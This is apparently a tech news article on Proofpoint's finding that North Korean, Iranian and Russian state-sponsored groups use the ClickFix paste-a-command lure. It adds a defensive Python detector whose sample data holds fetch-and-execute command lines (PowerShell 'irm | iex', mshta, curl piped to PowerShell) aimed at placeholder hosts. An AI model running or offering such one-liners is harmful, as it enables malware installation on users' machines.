- Proofpoint says multiple state-sponsored groups have been seen using the ClickFix attack technique
- Russian, North Korean and Iranian actors are all involved
- State-sponsored actors are mainly focused on cyber-espionage
The ClickFix attack technique has become so popular that even state-sponsored threat actors are using it, Proofpoint's researchers say, after observing at least three groups taking advantage of the method in the last quarter of 2024.
In an in-depth report, Proofpoint said it saw Kimsuky, MuddyWater, UNK_RemoteRogue and APT28 all using ClickFix in their attack chains.
Kimsuky is a well-known North Korean threat actor, MuddyWater is Iranian, while UNK_RemoteRogue and APT28 are believed to be Russian. Apart from North Korea's Lazarus group, state-sponsored threat actors are mainly focused on cyber-espionage, stealing sensitive information from diplomats, critical infrastructure organizations, think tanks and similar organizations in adversary states.
Not revolutionary
“The incorporation of ClickFix is not revolutionizing the campaigns carried out by TA427, TA450, UNK_RemoteRogue and TA422, but replaces the installation and execution stages in the existing infection chains,” Proofpoint explained.
ClickFix has been in the headlines for months. It is a social engineering tactic similar to the old “you have a virus” pop-ups that plagued websites two decades ago.
Originally, the pop-up would invite the visitor to download and run an antivirus program that was, in fact, just malware.
When the industry countered this attack by going after the infrastructure behind it, crooks switched to leaving a phone number for supposed IT support.
Victims who called the number would be tricked into installing remote desktop software, giving the crooks the ability to download and run malware on their devices.
The ClickFix attack takes this method and gives it a unique twist. It still begins with a pop-up, but sometimes victims are also asked to “complete a CAPTCHA”, “verify their identity” or similar. The process does not require clicking a download button; instead, it asks them to copy and paste a command into their Run dialog.
Although it sounds crazy, it has also been quite successful, as demonstrated by its adoption by nation states.
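The detail that matters for defenders is the last step: the victim types a command into the Run dialog, so the evidence is a command line launched from the shell rather than a downloaded file. The Python helper below is an added example, not part of this article or of Proofpoint's report; it triages strings a user typed into the Run box (or command lines taken from process-creation logs) for the traits such pastes tend to share: a script host, a one-line fetch-and-execute, a hidden window, or an encoded command. The sample entries, rule names and `example.invalid` URLs are all constructed for illustration.

```python
import re

# Constructed sample entries (not real indicators): the kind of strings a
# defender might collect from Run-dialog history or process-creation logs.
# The URLs are placeholders on a reserved, non-resolving domain.
SAMPLE_RUN_ENTRIES = [
    "notepad.exe",
    "powershell -w hidden -c \"irm http://captcha-check.example.invalid/v | iex\"",
    "mshta http://verify-identity.example.invalid/p.hta",
    "calc",
    "cmd /c curl -s http://fix.example.invalid/f | powershell -",
    "powershell -EncodedCommand SQBFAFgA",
]

# Each rule pairs a regex with the reason it is suspicious. The rules are
# assumptions about what a ClickFix-style paste looks like, chosen for
# illustration rather than taken from any vendor's detection content.
RULES = [
    (re.compile(r"\b(powershell|pwsh)\b.*\b(iex|invoke-expression)\b", re.I),
     "PowerShell with Invoke-Expression"),
    (re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|curl|wget)\b.*https?://", re.I),
     "downloads remote content"),
    (re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I),
     "mshta launching a remote HTA"),
    (re.compile(r"-(w|windowstyle)\s+hidden\b", re.I),
     "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I),
     "encoded command"),
]


def classify_run_entry(entry):
    """Return the reasons (in rule order) this entry looks like a ClickFix paste.

    An empty list means no rule matched.
    """
    return [reason for pattern, reason in RULES if pattern.search(entry)]


def flag_run_entries(entries):
    """Return {entry: [reasons]} for every entry that matched at least one rule."""
    hits = {}
    for entry in entries:
        reasons = classify_run_entry(entry)
        if reasons:
            hits[entry] = reasons
    return hits


if __name__ == "__main__":
    for entry, reasons in flag_run_entries(SAMPLE_RUN_ENTRIES).items():
        print(f"SUSPICIOUS: {entry}")
        print(f"  -> {', '.join(reasons)}")
```

Run on the constructed sample, four of the six entries are flagged; `notepad.exe` and `calc` pass untouched. The rules deliberately key on behaviour (fetch-and-run, hidden window, encoding) rather than on any particular domain, since lure infrastructure changes far faster than the shape of the command the victim is asked to paste.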
Via The Hacker News